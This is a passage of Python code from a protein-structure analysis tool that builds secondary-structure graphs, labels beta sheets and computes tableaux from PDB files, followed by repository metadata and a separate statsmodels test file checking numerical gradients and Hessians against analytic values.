found_useful_node = False
for ptnode in nodelist:
if isinstance(ptnode, PTNodeStrand):
found_useful_node = True
break
elif isinstance(ptnode, PTNodeHelix):
if ptnode.get_type() == "ALPHA":
found_useful_node = True
break
elif ((ptnode.get_type() == "310" and
self.include_310_helices) or
(ptnode.get_type() == "PI" and
self.include_pi_helices)):
found_useful_node = True
break
if not found_useful_node:
sys.stderr.write('WARNING: only pi or 310 helices in chain '
+ chainid +
'; chain ignored\n')
delete_chainid_list.append(chainid)
continue
# delete chains from chain_dict that were marked earlier for deletion
for chainid in delete_chainid_list:
self.chain_dict.pop(chainid)
# -------------------------------------------------------------------
# This is needed only for labelling sheets for HH and KK codes
# (see dfs_strands() etc. below)
# add edges for hydrogen bonds
# uses secstruct and chainid member data
# these are used for determining which side bridge partners are
# on (and also for drawing a hydrogen bond graph if requested)
self.add_hbond_edges_from_secstruct()
# add edges for bridge partners
# uses secstruct and chainid member data
self.add_bridge_edges_from_secstruct()
#---------------------------------------------------------------------
# for sequential numbering, we'll build this dictionary mapping
# sequential number (note NOT restarting for each chain)
# to PTNode
# so that sequential numbers as used in ptgraph2 -b sequential
# option.
# this is a dictionary of { seqnum : PTNode }
self.seqnum2node = {}
for (seqnum, node) in \
enumerate([node for node in self.iter_nodes() if \
not ( (isinstance(node, PTNodeTerminus)) or
(isinstance(node, PTNodeHelix) and
( (node.get_type() == "310" and
not self.include_310_helices) or
(node.get_type() == "PI" and
not self.include_pi_helices) ) ) ) ]):
self.seqnum2node[seqnum+1] = node # start at 1 not 0
# ------------------------------------------------------------------------
def get_residue_list(self, pdb_struct, domain, getchainid = None):
"""
Return list of Bio.PDB Residue objects in this domain, and optionally
in the specified chain.,
Parameters:
pdb_struct - Bio.PDB parsed PDB struct for the protein
domain - PTDomain (ptdomain.py) object listing the segment(s)
that make up this domain (only one domain processed at a
time).
getchainid - chain identifier to get residues in (default None -
all chains).
Return value:
list of Bio.PDB Residue objects in the domain (and optionally chain).
Raises exceptions:
NoSSE_Exception for empty structure (happens eg on d1oayi_.ent)
"""
residue_list = []
try:
pdb_model = self.pdb_struct[0] # TODO always using model 0 for now
except KeyError:
raise NoSSE_Exception
for chain in pdb_model:
chainid = ptsecstruct.pdb_chainid_to_stride_chainid(chain.get_id())
if getchainid and getchainid != chainid:
continue # this is not the chain we want
# Build a list of Bio.PDB Residue objects that are in this
# domain.
# id of a residue in Bio.PDB is tuple (hetatm, resseqnum, icode)
# so we choose those where residue PDB number
# (in the current chain) is in the domain.
# TODO: maybe should use polypeptide builder for this instead
# (and indeed should probably use it right from the beginning) -
residue_list += [ residue for residue in chain.get_unpacked_list()
if is_aa(residue) and
domain.is_in_domain(chainid, residue.get_id()[1])
]
if getchainid:
break # if getchainid specified, we now have it so can quit
return residue_list
# iter_strands(), dfs_strands(),
# find_connected_components() and label_sheets() are needed to assign
# strands to sheets in order for HH and KK codes to be used for strands
# only when they are in the same sheet.
# TODO this code is cut&pasted from ptgraph2.py, probably should
# have a base class that this at PTGraph2 both inherit from or somethibng
# rather than all this duplication.
def add_hbond_edges_from_secstruct(self):
"""
Add edges between structural elements for hydrogen bonds between
those nodes. Called by build_graph_from_secstruct().
NB: adds bonds between STRANDs only, not between HELIXes (helices).
Parameters: None.
Return value: None.
Uses data members:
readonly:
secstruct - PTSecStruct object to get hbonds from
chainid - chainid of chain in PTSecStruct to use
read/write:
chain_dict - dict by chainid of
list of nodes (changes node data, not list as such)
Precondition: each nodelist in chain_dict
is sorted (by start res seq ascending);
this is done by build_graph_from_secstruct()
before calling.
"""
hbond_list = self.secstruct.hbond_list
# TODO: do this more efficiently using presorting (ie how it used to
# be done when only one chain)
for (chainid1, resnum1, chainid2, resnum2, dist) in hbond_list:
for ptnode in self.iter_strands():
if chainid1 == ptnode.get_chainid() and \
resnum1 >= ptnode.get_start_res_seq() and \
resnum1 <= ptnode.get_end_res_seq():
dest_node = self.find_node_containing_seqnum(resnum2,
chainid2)
if dest_node != None and \
isinstance(dest_node, PTNodeStrand): # only STRANDs
ptnode.add_hbond(dest_node, resnum1, resnum2, dist)
def add_bridge_edges_from_secstruct(self):
"""
Add edges between strand nodes representing beta brdiges between
those nodes (add just one edge between any two strands).
Called by build_graph_from_secstruct().
NB: adds bonds between STRANDs only, not between HELIXes (helices).
Parameters: None.
Return value: None.
Uses data members:
readonly:
secstruct - PTSecStruct object to get hbonds from
chainid - chainid of chain in PTSecStruct to use
read/write:
chain_dict - dict by chainid of
list of nodes (changes node data, not list as such)
"""
bridge_list = self.secstruct.bridgeres_list
# (chainid1, resnum1, chainid2, resnum2, bdir)
# TODO: do this more efficiently using presorting (ie how it used to
# be done when only one chain)
for ptnode in self.iter_strands():
for (chainid1, resnum1, chainid2, resnum2, bdir) in bridge_list:
if chainid1 == ptnode.get_chainid() and \
resnum1 >= ptnode.get_start_res_seq() and \
resnum1 <= ptnode.get_end_res_seq():
try:
dest_node = self.find_node_containing_seqnum(resnum2,
chainid2)
except KeyError:
dest_node = None
sys.stderr.write('WARNING: chain ' + chainid2 + \
' involved in beta bridge not found.'+\
'\n Probably due to domain parsing' +\
' breaking a beta sheet.\n')
if dest_node != None and \
isinstance(dest_node, PTNodeStrand): # only STRANDs
if ptnode == dest_node:
sys.stderr.write('WARNING: ignoring self-bridge ' +
ptnode.nodeid + '\n')
else:
ptnode.add_bridge(dest_node, bdir)
def iter_strands(self):
"""
This generator function iterates over all strands in this PTGraph
object. I.e. it yields a strand for each strand in the
node lists.
Parameters: None.
Return value: YIELDs a strand.
Uses data members (readonly):
self.chain_dict - dict of { chainid : list of nodes }
"""
for nodelist in self.iter_chains():
for ptnode in nodelist:
if isinstance(ptnode, PTNodeStrand):
yield ptnode
def find_node_containing_seqnum(self, res_seqnum, chainid):
"""
Find and return node in node list for chain chainid
containing supplied PDB residue
sequence number.
Parameters:
res_seqnum - PDB residue sequence number to find node for
chainid - chain identifier to find node in
Return value:
PTNode pointer of PTNode containing the supplied residue seq num
in supplied chainid
or None if the residue is not in a structural element PTNode
Uses data members (readonly):
chain_dict - chainid dict of list of PTNodes
"""
# TODO: since node_list is sorted should use binary search here
# (maybe try the Python bisect module)
if not self.chain_dict.has_key(chainid):
return None # no such chain, can happen due to domain parsing
for ptnode in self.chain_dict[chainid]:
if ptnode.is_in_interval(res_seqnum):
return ptnode
return None
def dfs_strands(self, start_strand, visited, dfs_list, from_node,
back_edge_list,
sheet_id=None):
"""
Make a depth-first search traversal of STRAND nodes
using bridge (not sequence)
edges starting at the specfied strand.
Parameters:
start_strand - STRAND node to start at
visited - (in/out) dictionary of {ptnode:True} visited nodes
dfs_list - (in/out) list of ptnodes visited in dfs order
from_node - node from which we are being (recursively) called
back_edge_list - list of (node, node) tuples representing an
edge between the two nodes, which is a back
edge, i.e. from a node to an ancestor of that
node in the spanning tree. The back edge
means there is a cycle of which the back
edge forms a part.
sheet_id - identifier of this sheet (connected component) to mark
each strand in it with, or None to not mark at all
(default).
Recursive function. call initially as
dfslist = []
back_edge_list = []
dfs_strands(startnode, {}, dfslist, None, back_edge_list)
Return value:
None. (Output is dfs_list, back_edge_list parameters)
Uses members (readonly):
chain_dict - dict by chainid of list of PTNodes
"""
visited[start_strand] = True
if sheet_id != None:
start_strand.set_sheet_id(sheet_id)
#print 'xxx',str(start_strand),sheet_id
dfs_list.append(start_strand)
for (node, bdir_unused, side_unused) in start_strand.get_bridge_list():
if node not in visited:
self.dfs_strands(node, visited, dfs_list, start_strand,
back_edge_list, sheet_id)
elif node != from_node: #not parent of start_strand in spanning tree
# don't add duplicate back edges
# ((node1,node2) is same as (node2,node1))
duplicate = False
for (a,b) in back_edge_list:
if ((start_strand == a and node == b) or
(node == a and start_strand == b)):
duplicate = True
break
if not duplicate:
if verbose:
sys.stderr.write('dfs_strands back edge from ' +
str(start_strand) + ' to ' +
str(node) +
'\n')
back_edge_list.append((start_strand, node))
def find_connected_components(self):
"""
Find the connected components (considering only STRAND nodes
and bridge [not sequence] edges in the graph).
This is done by a DFS traversal at every node in the graph
(skipping already visited ones), giving us the partition of
the graph into connected components.
Parameters: None
Uses member data:
chain_dict - dict by chainid of list
of PTNodes in the graph (modifies PTNodes not list)
(WRITE):
sheet_dict -
dictionary of { sheet_id : ptnode_list } where sheet_id is 'A',
'B', etc. and ptnode_list is a list of PTNodeStrand instances
in that connected component (sheet).
self.sheet_backedges_dict -
dict of {sheet_id : ((node1,node2))}
listing 'back edges' i.e. edges
to an ancestor in DFS spanning tree
in the connected component (sheet).
note (node1,node2) and (node2,node1)
are the same (undirected graph) and
only one of the two is present in the
Labels each strand node with the sheet id it belongs to as it goes.
"""
sheet_id = 'A' # sheet id is single alpha char A, B, etc.
# (will be a problem for more than 26 sheets... eg
# this actually happens on 2J28), wrap to lowercase
visited = {} # dictionary of {ptnode : True} visited nodes
back_edge_list = [] # list of (ptnode, ptnode) tuples for back edges
self.sheet_dict = {} # dictionary of {sheet_id : nodelist}
self.sheet_backedges_dict = {} # dict of {sheet_id : ((node1,node2))}
# listing 'back edges' i.e. edges
# to an ancestor in DFS spanning tree
# in the connected component (sheet).
# note (node1,node2) and (node2,node1)
# are the same (undirected graph) and
# only one of the two is present in the
# list.
for node in self.iter_strands():
if node not in visited:
connected_node_list = []
back_edge_list = []
self.dfs_strands(node, visited, connected_node_list, None,
back_edge_list,
sheet_id)
self.sheet_dict[sheet_id] = list(connected_node_list)
self.sheet_backedges_dict[sheet_id] = list(back_edge_list)
sheet_id = chr(ord(sheet_id)+1)
if sheet_id == '[':
sheet_id = 'a' # if go past Z, wrap to lowercase
def label_sheets(self):
"""
Label strands with sheet id to which each belongs by finding
connected components; strands in a connected componenent of
the graph (considering nonly STRAND nodes and bridge edges)
form a sheet.
Parameters: None
Uses member data:
node_list - list of nodes. Modifies nodes by labelling them.
Return value:
Returns the sheet dictionary (dictionary of
{ sheet_id : ptnode_list }) from find_connected_components.
"""
# ACtually don't do anything except call find_connected_components()
# which does the labeling itself (more efficient since it knows
# as each one is added which sheet it is added to)
return self.find_connected_components()
# -------------------------------------------------------------------------
def build_tableau(self, pdbid, domain, ptnode_list = None,
use_hk = True):
"""
Build the tableau data member (see PTTableau in pttableau.py)
by calling function in pttableau.py.
Parameters:
pdbid - PDB identifier of the strucutre
domain - The PTDomain object for our current domain
ptnode_list - list of PTNodes (in sequence order, but not
necessarily continguous) to build the tableau for,
or None to use all nodes in domain.
Default None.
use_hk - If True, use the HH and KK codes for respectively
antiparallel and parallel strands. Default True.
Return value: None
Uses data members (WRITE):
tableau - created by this function
(readonly):
chain_dict - dict { chainid : ptnode_list } of nodes in chains
pdb_structure - Bio.PDB parsed PDB structure
"""
if ptnode_list == None:
# Build list of all helix and strand PTNodes
ptnode_list = []
for nodelist in self.iter_chains():
for node in nodelist: # these nodes are only those in our domain
if (not isinstance(node, PTNodeTerminus)): # not terminii
ptnode_list.append(node)
self.tableau = pttableau.compute_tableau(ptnode_list, self.pdb_struct,
use_hk)
def build_omega_matrix(self, pdbid, domain, ptnode_list = None):
"""
Return the relative angles matrix by calling function in pttableau.py
Parameters:
pdbid - PDB identifier of the strucutre
domain - The PTDomain object for our current domain
ptnode_list - list of PTNodes (in sequence order, but not
necessarily continguous) to build the tableau for,
or None to use all nodes in domain.
Default None.
Return value: Numeric.array Omega matrix.
Uses data members:
(readonly):
chain_dict - dict { chainid : ptnode_list } of nodes in chains
pdb_structure - Bio.PDB parsed PDB structure
"""
if ptnode_list == None:
# Build list of all helix and strand PTNodes
ptnode_list = []
for nodelist in self.iter_chains():
for node in nodelist: # these nodes are only those in our domain
if (not isinstance(node, PTNodeTerminus)): # not terminii
ptnode_list.append(node)
return pttableau.compute_omega_matrix(ptnode_list, self.pdb_struct)
def build_sse_dist_matrix(self, pdbid, domain, ptnode_list = None):
"""
Return SSE axis midpoint distance matrix by calling function
in ptdistmatrix.py
Parameters:
pdbid - PDB identifier of the strucutre
domain - The PTDomain object for our current domain
ptnode_list - list of PTNodes (in sequence order, but not
necessarily continguous) to build the matrix for,
or None to use all nodes in domain.
Default None.
Return value: Numeric.array SSE midpoint distance matrix.
Uses data members:
(readonly):
chain_dict - dict { chainid : ptnode_list } of nodes in chains
pdb_structure - Bio.PDB parsed PDB structure
"""
if ptnode_list == None:
# Build list of all helix and strand PTNodes
ptnode_list = []
for nodelist in self.iter_chains():
for node in nodelist: # these nodes are only those in our domain
if (not isinstance(node, PTNodeTerminus)): # not terminii
ptnode_list.append(node)
return compute_sse_midpoint_dist_matrix(ptnode_list, self.pdb_struct)
#-----------------------------------------------------------------------------
#
# Function definitions
#
#-----------------------------------------------------------------------------
def make_tableaux(pdb_filename,
pdb_struct,
secstruct_program,
domain_program,
include_310_helices = False,
include_pi_helices = False,
use_numeric = False,
sse_id_list = None,
use_hk = False,
min_sse_len = None,
build_dist_matrix = False,
chainid = None,
domainid = None):
"""
For the supplied filemame, read PDB format data from that file
and create tableaux or SSE distance matrix for that structre.
This function is called by get_tableaux() (below), which handles
compressed files etc.
Note: for multi-domains, will be multiple output tableaux, one for
each domain.
Paramteters:
pdb_filename - filename of PDB file to read
pdb_struct - Bio.PDB parsed PDB structure
secstruct_program - secondary structure definition program
('stride' or 'dssp' or 'pdb' or 'pmml') to use.
domain_progam - domain decompositino method ('ddomain','cath', etc.)
include_310_helices - if True, include 3_10 helices in the graph
include_pi_helices - if True, include pi helices in the graph
use_numeric - If True, use numeric matrix rather than tableau
sse_id_list - list of ints representing SSE sequential id numbers
to include in tableau. Default None.
When None, all SSEs are included.
use_hk - If True, use HH and KK codes for strands.
min_sse_len - if not None, the minimum length of SSE to include
in tableau.
build_dist_matrix - If True, build SSE midpoint distance matrix
instead of tableau.
chainid - If not None, only build tableau for that chain id.
domainid - If note None, only build tableau for that domain id.
Return value: tuple (tableaux_list, sse_string_list)
where tableaux_list is
list of tableaux (only one in list unless domain decomp
is used and finds multiple domains);
or list of omega matrices (Numeric.array) if use_numeric
is True
or list of SSE axis midpiont distance matrices
(Numeric.array) if build_dist_matrix is True
and
sse_string_list is SSE string description e.g. 'EEHHE' etc.
"""
(pdbid,suffix) = os.path.splitext(os.path.basename(pdb_filename))
pdbid = pdbid.upper()
if len(pdbid) >= 6 and pdbid[:3] == "PDB":
pdbid = pdbid[3:7]
if secstruct_program == "pdb":
secstruct = ptsecstruct.read_secstruct_from_pdb_file(pdb_filename)
if secstruct != None:
secstruct.pdb_header = pdb_struct.header['head']
else:
secstruct_program = "dssp"
sys.stderr.write('WARNING: error with HELIX or SHEET cards in PDB'
': ' + secstruct_program +
' will be used instead\n')
else:
secstruct = None
if secstruct == None:
# read secondary structure information from STRIDE or DSSP
if secstruct_program == "stride":
secstruct = ptsecstruct.read_secstruct_from_stride(pdb_filename)
elif secstruct_program == "dssp":
secstruct = ptsecstruct.read_secstruct_from_dssp(pdb_filename)
elif secstruct_program == "pmml":
secstruct = ptsecstruct.read_secstruct_from_pmml(pdb_filename)
else:
assert(False)
if domain_program != None:
domain_list = getdomains.get_domains(domain_program,
pdbid, pdb_filename, pdb_struct)
else:
domain_list = [PTDomain(None, None)] # one-domain protein, no further info
# for SSEs that cross domain boundaries, move whole SSE to one of the domains
fixup_crossdomain_sses(secstruct, domain_list)
tableaux_list = [] # NB may be list of PTTableau or list of Numeric.array
sse_str_list = []
for domain in domain_list:
if domainid and domain.domainid != domainid:
if verbose:
sys.stderr.write("skipped domainid " + domainid + "\n")
continue
ptg = TableauBuild(pdb_struct, pdbid,
include_310_helices, include_pi_helices)
# build tableaubuild object from secondary structure
if secstruct_program == "pmml":
ignore_insertion_codes = True # PMML does not report them
else:
ignore_insertion_codes = False
try:
ptg.build_graph_from_secstruct(secstruct, domain, chainid,
ignore_insertion_codes)
except NoSSE_Exception:
if chainid:
sys.stderr.write('WARNING: No helices or strands found in ' +
pdbid +
' chain ' + chainid +
': skipping\n')
else:
sys.stderr.write('WARNING: No helices or strands found in ' +
pdbid +
': skipping\n')
continue
except ValueError:
# PTNode.__init__ raises ValueEror if end_res_seq < start_res_seq
# This happens on e.g. d1dkia_.ent when using PMML (only)
# as PMML does not handle insertion codes so end up with
# residue numbers all wrong. Nothign we can do with this much of
# a mess, jsut give up.
sys.stderr.write('ERROR: out of order residue numbers in ' +
pdbid + ', probably due to insertino codes ' +
'not workin in pmml: skipping this structure\n')
continue
if use_hk: # only need to know sheets if using HH and KK codes
if secstruct_program == "pmml":
sys.stderr.write('WARNING: PMML has no hbond or bridge information, cannot label sheets for HH and KK codes\n')
ptg.label_sheets()
if verbose:
for nodelist in ptg.iter_chains():
for node in nodelist:
sys.stderr.write(str(node) + '\n')
# if list of int SSE sequential ids supplied, convert to list of
# PTNode objects
if sse_id_list:
try:
ptnode_list = [ptg.seqnum2node[sse_id] for sse_id in sse_id_list]
except KeyError,k:
sys.stderr.write("SSE sequential id " + str(k)
+ " does not exist\n")
sys.exit(1)
else:
ptnode_list = None
if not ptnode_list:
# Build list of all helix and strand PTNodes with len >= min_sse_len
ptnode_list = []
for nodelist in ptg.iter_chains():
for node in nodelist: # these nodes are only those in our domain
if (not isinstance(node, PTNodeTerminus)): # not terminii
ptnode_list.append(node)
if min_sse_len:
ptnode_list = [node for node in ptnode_list
if node.get_span() >= min_sse_len]
if build_dist_matrix:
dist_matrix = ptg.build_sse_dist_matrix(pdbid, domain, ptnode_list)
tableaux_list.append(dist_matrix)
elif use_numeric:
Omega = ptg.build_omega_matrix(pdbid, domain, ptnode_list)
tableaux_list.append(Omega)
else:
ptg.build_tableau(pdbid, domain, ptnode_list, use_hk)
tableaux_list.append(ptg.tableau)
sse_str = ""
for node in ptnode_list:
if isinstance(node, PTNodeStrand):
sse_str += 'E'
elif isinstance(node, PTNodeHelix):
sse_str += 'H'
else:
raise ValueError('bad node type ' + str(node))
sse_str_list.append(sse_str)
return (tableaux_list, sse_str_list)
def get_tableaux(pdb_filename,
secstruct_program = 'dssp',
domain_program = 'none',
include_310_helices = True,
include_pi_helices = True,
sse_id_list = None,
min_sse_len = None,
use_numeric = False,
use_hk = False,
build_dist_matrix = False):
"""
Get a tableau for a single PDB or ASTRAL pdb-style file
(compressed files e.g. pdb1qlp.ent.gz) or uncompressed
or the ASTRAL pdb-style hierarchy
(uncompressed files e.g. d1qlpa_.ent).
Parameters:
pdb_filename - filename of PDB or ASTRAL pdb-style file, as above.
secstruct_program - secondary structure definition program
('stride' or 'dssp' or 'pdb') to use.
domain_progam - domain decompositino method ('ddomain','cath', etc.)
include_310_helices - if True, include 3_10 helices in the graph
include_pi_helices - if True, include pi helices in the graph
sse_id_list - list of ints representing SSE sequential id numbers
to include in tableau. Default None.
When None, all SSEs are included.
min_sse_len - min number of residues in SSE to be ncluded.
Default None (no min length).
use_numeric - if True build Numeric.array Omega matrix not PTTableau
use_hk - If True build tableaux with HH and KK codes for strands in
same sheet. default False.
build_dist_matrix - If True, build SSE midpoint distance matrices
instead of tableaux.
Return value:
tuple (pdbid, tableaux_list, sse_string_list)
from the pdb file, only one in lists unless
domain decomposition is used and finds multidomains in input.
tableaux_list is list of tableaux or omega matrices
sse_string_list is SSE string description e.g. 'EEHHE' etc.
"""
tableaux_list = []
# check for compressed files. We only support gzip (.gz)
# Note we are not using the zlib or GzipFile python modules
# since we are calling to external programs which require the
# file uncompressed themsevles anyway so we'll just run gzip
# to uncompress the file to a temporary directory.
pdb_file_basename = os.path.basename(pdb_filename)
(name,extension) = os.path.splitext(pdb_file_basename)
if extension == '.gz':
TMPDIR = os.tempnam(None, "ptgz")
os.mkdir(TMPDIR)
tmp_pdbfilename = os.path.join(TMPDIR, name)
os.system("gzip " + pdb_filename + " -d -c > " + tmp_pdbfilename)
our_pdb_filename = tmp_pdbfilename
used_tmp_file = True
else:
our_pdb_filename = pdb_filename
used_tmp_file = False
try:
pdbid = name
if len(pdbid) >= 6 and pdbid[:3].upper() == "PDB":
pdbid = pdbid[3:7].upper()
# parse PDB file
pdb_parser = PDBParser()
pdb_struct = pdb_parser.get_structure(pdbid, our_pdb_filename)
# create the Tableaux and output them
(tableaux_list, sse_string_list) = make_tableaux(our_pdb_filename,
pdb_struct,
secstruct_program,
domain_program,
include_310_helices,
include_pi_helices,
use_numeric,
sse_id_list,
use_hk,
min_sse_len,
build_dist_matrix)
finally:
if used_tmp_file:
cleanup_tmpdir(TMPDIR)
return (pdbid, tableaux_list, sse_string_list)
| {
"content_hash": "5df76ef612fa5e321f4f2a9ccd5a4edb",
"timestamp": "",
"source": "github",
"line_count": 1102,
"max_line_length": 127,
"avg_line_length": 42.6442831215971,
"alnum_prop": 0.5378558964974252,
"repo_name": "NirBenTalLab/proorigami-ptgraph",
"id": "554f580cedaaaca39697f7eccae0467ed0eac2fd",
"size": "47389",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tableaubuild.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1151802"
},
{
"name": "Shell",
"bytes": "39242"
}
],
"symlink_target": ""
} |
'''Testing numerical differentiation
Still some problems, with API (args tuple versus *args)
finite difference Hessian has some problems that I didn't look at yet
Should Hessian also work per observation, if fun returns 2d
'''
from __future__ import print_function
import numpy as np
from numpy.testing import assert_almost_equal, assert_allclose
import statsmodels.api as sm
from statsmodels.tools import numdiff
from statsmodels.tools.numdiff import (approx_fprime, approx_fprime_cs,
approx_hess_cs)
DEC3 = 3
DEC4 = 4
DEC5 = 5
DEC6 = 6
DEC8 = 8
DEC13 = 13
DEC14 = 14
def maxabs(x,y):
return np.abs(x-y).max()
def fun(beta, x):
return np.dot(x, beta).sum(0)
def fun1(beta, y, x):
#print(beta.shape, x.shape)
xb = np.dot(x, beta)
return (y-xb)**2 #(xb-xb.mean(0))**2
def fun2(beta, y, x):
#print(beta.shape, x.shape)
return fun1(beta, y, x).sum(0)
#ravel() added because of MNLogit 2d params
class CheckGradLoglikeMixin(object):
def test_score(self):
for test_params in self.params:
sc = self.mod.score(test_params)
scfd = numdiff.approx_fprime(test_params.ravel(),
self.mod.loglike)
assert_almost_equal(sc, scfd, decimal=1)
sccs = numdiff.approx_fprime_cs(test_params.ravel(),
self.mod.loglike)
assert_almost_equal(sc, sccs, decimal=11)
def test_hess(self):
for test_params in self.params:
he = self.mod.hessian(test_params)
hefd = numdiff.approx_fprime_cs(test_params, self.mod.score)
assert_almost_equal(he, hefd, decimal=DEC8)
#NOTE: notice the accuracy below
assert_almost_equal(he, hefd, decimal=7)
hefd = numdiff.approx_fprime(test_params, self.mod.score,
centered=True)
assert_allclose(he, hefd, rtol=5e-10)
hefd = numdiff.approx_fprime(test_params, self.mod.score,
centered=False)
assert_almost_equal(he, hefd, decimal=4)
hescs = numdiff.approx_fprime_cs(test_params.ravel(),
self.mod.score)
assert_allclose(he, hescs, rtol=1e-13)
hecs = numdiff.approx_hess_cs(test_params.ravel(),
self.mod.loglike)
assert_allclose(he, hecs, rtol=1e-9)
#NOTE: Look at the lack of precision - default epsilon not always
#best
grad = self.mod.score(test_params)
hecs, gradcs = numdiff.approx_hess1(test_params, self.mod.loglike,
1e-6, return_grad=True)
assert_almost_equal(he, hecs, decimal=1)
assert_almost_equal(grad, gradcs, decimal=1)
hecs, gradcs = numdiff.approx_hess2(test_params, self.mod.loglike,
1e-4, return_grad=True)
assert_almost_equal(he, hecs, decimal=3)
assert_almost_equal(grad, gradcs, decimal=1)
hecs = numdiff.approx_hess3(test_params, self.mod.loglike, 1e-5)
assert_almost_equal(he, hecs, decimal=4)
class TestGradMNLogit(CheckGradLoglikeMixin):
def __init__(self):
#from .results.results_discrete import Anes
data = sm.datasets.anes96.load()
exog = data.exog
exog = sm.add_constant(exog, prepend=False)
self.mod = sm.MNLogit(data.endog, exog)
#def loglikeflat(self, params):
#reshapes flattened params
# return self.loglike(params.reshape(6,6))
#self.mod.loglike = loglikeflat #need instance method
#self.params = [np.ones((6,6)).ravel()]
res = self.mod.fit(disp=0)
self.params = [res.params.ravel('F')]
def test_hess(self):
#NOTE: I had to overwrite this to lessen the tolerance
for test_params in self.params:
he = self.mod.hessian(test_params)
hefd = numdiff.approx_fprime_cs(test_params, self.mod.score)
assert_almost_equal(he, hefd, decimal=DEC8)
#NOTE: notice the accuracy below and the epsilon changes
# this doesn't work well for score -> hessian with non-cs step
# it's a little better around the optimum
assert_almost_equal(he, hefd, decimal=7)
hefd = numdiff.approx_fprime(test_params, self.mod.score,
centered=True)
assert_almost_equal(he, hefd, decimal=4)
hefd = numdiff.approx_fprime(test_params, self.mod.score, 1e-9,
centered=False)
assert_almost_equal(he, hefd, decimal=2)
hescs = numdiff.approx_fprime_cs(test_params, self.mod.score)
assert_almost_equal(he, hescs, decimal=DEC8)
hecs = numdiff.approx_hess_cs(test_params, self.mod.loglike)
assert_almost_equal(he, hecs, decimal=5)
#NOTE: these just don't work well
#hecs = numdiff.approx_hess1(test_params, self.mod.loglike, 1e-3)
#assert_almost_equal(he, hecs, decimal=1)
#hecs = numdiff.approx_hess2(test_params, self.mod.loglike, 1e-4)
#assert_almost_equal(he, hecs, decimal=0)
hecs = numdiff.approx_hess3(test_params, self.mod.loglike, 1e-4)
assert_almost_equal(he, hecs, decimal=0)
class TestGradLogit(CheckGradLoglikeMixin):
def __init__(self):
data = sm.datasets.spector.load()
data.exog = sm.add_constant(data.exog, prepend=False)
#mod = sm.Probit(data.endog, data.exog)
self.mod = sm.Logit(data.endog, data.exog)
#res = mod.fit(method="newton")
self.params = [np.array([1,0.25,1.4,-7])]
##loglike = mod.loglike
##score = mod.score
##hess = mod.hessian
class CheckDerivativeMixin(object):
def __init__(self):
nobs = 200
#x = np.arange(nobs*3).reshape(nobs,-1)
np.random.seed(187678)
x = np.random.randn(nobs,3)
xk = np.array([1,2,3])
xk = np.array([1.,1.,1.])
#xk = np.zeros(3)
beta = xk
y = np.dot(x, beta) + 0.1*np.random.randn(nobs)
xkols = np.dot(np.linalg.pinv(x),y)
self.x = x
self.y = y
self.params = [np.array([1.,1.,1.]), xkols]
self.init()
def init(self):
pass
def test_grad_fun1_fd(self):
for test_params in self.params:
#gtrue = self.x.sum(0)
gtrue = self.gradtrue(test_params)
fun = self.fun()
epsilon = 1e-6
gfd = numdiff.approx_fprime(test_params, fun, epsilon=epsilon,
args=self.args)
gfd += numdiff.approx_fprime(test_params, fun, epsilon=-epsilon,
args=self.args)
gfd /= 2.
assert_almost_equal(gtrue, gfd, decimal=DEC6)
def test_grad_fun1_fdc(self):
for test_params in self.params:
#gtrue = self.x.sum(0)
gtrue = self.gradtrue(test_params)
fun = self.fun()
epsilon = 1e-6 #default epsilon 1e-6 is not precise enough
gfd = numdiff.approx_fprime(test_params, fun, epsilon=1e-8,
args=self.args, centered=True)
assert_almost_equal(gtrue, gfd, decimal=DEC5)
def test_grad_fun1_cs(self):
for test_params in self.params:
#gtrue = self.x.sum(0)
gtrue = self.gradtrue(test_params)
fun = self.fun()
gcs = numdiff.approx_fprime_cs(test_params, fun, args=self.args)
assert_almost_equal(gtrue, gcs, decimal=DEC13)
def test_hess_fun1_fd(self):
for test_params in self.params:
#hetrue = 0
hetrue = self.hesstrue(test_params)
if not hetrue is None: #Hessian doesn't work for 2d return of fun
fun = self.fun()
#default works, epsilon 1e-6 or 1e-8 is not precise enough
hefd = numdiff.approx_hess1(test_params, fun, #epsilon=1e-8,
args=self.args)
#TODO:should be kwds
assert_almost_equal(hetrue, hefd, decimal=DEC3)
#TODO: I reduced precision to DEC3 from DEC4 because of
# TestDerivativeFun
hefd = numdiff.approx_hess2(test_params, fun, #epsilon=1e-8,
args=self.args)
#TODO:should be kwds
assert_almost_equal(hetrue, hefd, decimal=DEC3)
hefd = numdiff.approx_hess3(test_params, fun, #epsilon=1e-8,
args=self.args)
#TODO:should be kwds
assert_almost_equal(hetrue, hefd, decimal=DEC3)
def test_hess_fun1_cs(self):
for test_params in self.params:
#hetrue = 0
hetrue = self.hesstrue(test_params)
if not hetrue is None: #Hessian doesn't work for 2d return of fun
fun = self.fun()
hecs = numdiff.approx_hess_cs(test_params, fun, args=self.args)
assert_almost_equal(hetrue, hecs, decimal=DEC6)
class TestDerivativeFun(CheckDerivativeMixin):
def init(self):
xkols = np.dot(np.linalg.pinv(self.x), self.y)
self.params = [np.array([1.,1.,1.]), xkols]
self.args = (self.x,)
def fun(self):
return fun
def gradtrue(self, params):
return self.x.sum(0)
def hesstrue(self, params):
return np.zeros((3,3)) #make it (3,3), because test fails with scalar 0
#why is precision only DEC3
class TestDerivativeFun2(CheckDerivativeMixin):
def init(self):
xkols = np.dot(np.linalg.pinv(self.x), self.y)
self.params = [np.array([1.,1.,1.]), xkols]
self.args = (self.y, self.x)
def fun(self):
return fun2
def gradtrue(self, params):
y, x = self.y, self.x
return (-x*2*(y-np.dot(x, params))[:,None]).sum(0)
#2*(y-np.dot(x, params)).sum(0)
def hesstrue(self, params):
x = self.x
return 2*np.dot(x.T, x)
class TestDerivativeFun1(CheckDerivativeMixin):
def init(self):
xkols = np.dot(np.linalg.pinv(self.x), self.y)
self.params = [np.array([1.,1.,1.]), xkols]
self.args = (self.y, self.x)
def fun(self):
return fun1
def gradtrue(self, params):
y, x = self.y, self.x
return (-x*2*(y-np.dot(x, params))[:,None])
def hesstrue(self, params):
return None
y, x = self.y, self.x
return (-x*2*(y-np.dot(x, params))[:,None]) #TODO: check shape
if __name__ == '__main__':
epsilon = 1e-6
nobs = 200
x = np.arange(nobs*3).reshape(nobs,-1)
x = np.random.randn(nobs,3)
xk = np.array([1,2,3])
xk = np.array([1.,1.,1.])
#xk = np.zeros(3)
beta = xk
y = np.dot(x, beta) + 0.1*np.random.randn(nobs)
xkols = np.dot(np.linalg.pinv(x),y)
print(approx_fprime((1,2,3),fun,epsilon,x))
gradtrue = x.sum(0)
print(x.sum(0))
